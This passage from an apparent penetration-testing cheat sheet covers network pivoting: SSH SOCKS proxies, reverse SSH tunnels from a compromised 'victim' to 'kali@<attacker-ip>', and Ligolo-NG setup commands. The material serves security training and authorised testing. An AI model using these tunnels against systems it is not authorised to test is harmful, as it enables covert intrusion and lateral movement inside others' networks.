You can then browse/connect to localhost:your-port to acess victim:remote--port
SSH forward dynamic (SOCKS) proxy
ssh -D localhost:9999 -f -N target@<target-ip>
Reverse SSH tunnel
One common scenario is gaining a foothold without credentials so you can't bind ssh tunnel. But you can still reverse SSH tunnel from the victim to your box. Using the following technique, you'll be able to reach those.
ssh -N -R 3306:localhost:3306 kali@<attacker-ip>
Reverse SSH Dynamic (SOCKS) tunnel
ssh -N -R 127.0.0.1:9090 kali@<attacker-ip>
Ligolo-NG
A coworker of mine showed me this and I instantly fell in love with the concept. It has a proxy-agent system and it works just like a VPN using a TUN interface.
Setup TUN interface
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
Start proxy (agent handler)
./proxy -selfcert -laddr 10.10.14.21:443
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 10.10.14.21:443